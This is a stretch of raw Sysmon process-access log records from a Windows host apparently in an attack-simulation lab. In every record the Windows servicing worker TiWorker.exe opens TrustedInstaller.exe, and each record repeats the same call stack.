12:02:25.309{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.309{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.293{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.293{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.293{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.278{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.247{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.247{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.247{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.231{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.231{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.216{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.216{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.200{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 